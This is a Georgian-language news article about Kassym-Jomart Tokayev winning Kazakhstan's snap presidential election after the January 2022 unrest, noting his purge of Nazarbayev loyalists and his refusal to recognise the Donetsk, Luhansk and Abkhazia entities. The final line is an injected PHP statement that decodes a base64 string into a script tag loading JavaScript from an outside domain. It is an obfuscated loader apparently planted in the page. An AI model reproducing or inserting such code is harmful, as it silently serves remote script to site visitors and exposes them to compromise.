celsiusi
ავერსი შნაიდერი
ყაზახეთის საპრეზიდენტო არჩევნებში, რომელიც რიგგარეშე წესით ჩატარდა, ამჟამინდელმა ლიდერი, ყასიმ-ჟომართ თოყაევი იმარჯვებს.
 
არჩევნების ჩატარება სწორედ მისი სურვილი იყო.
 
წინასწარი მონაცემებით, თოყაევმა მარტივად დაამარცხა მისი ხუთივე კონკურენტი.
 
ქვეყანაში არჩევნები 2022 წლის იანვარში მომხდარი საპროტესტო აქციებისა და სამთავრობო შენონებზე თავდასხმის შემდეგ გადაწყდა.
 
საპროტესტო გამოსვლებისას თოყაევმა ქვეყანაში კოლექტიური უსაფრთხოების ხელშეკრულების ორგანიზაციის ძალები მიიწვია.
 
სიტუაციის დასტაბილურების შემდეგ კი თანამდებობებიდან გაათავისუფლა ყოფილი პრეზიდენტის, ნურსულთან ნაზარბაევის მომხრეები, რითაც საკუთარი პოზიციები გაიმყარა.
 
საპრეზიდენტო არჩევნების ჩატარება იყო კიდევ ერთი ნაბიჯი, რათა საკუთარი ძალაუფლება გაემყარებინა.
 
ყაზახეთი, მიუხედავად იმისა, რომ რუსეთის დეკლარირებული მოკავშირეა, რუსეთ უკრაინის ომში კრემლს ღიად მხარს არ უჭერს.
 
თოყაევის განცხადებით, იგი არ აპირებს აღიაროს ფსევდო-სახელმწიფოები, როგორებიცაა დონეცკისა და ლუგანსკის სახალხო რესპუბლიკები ან აფხაზეთი.
326
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");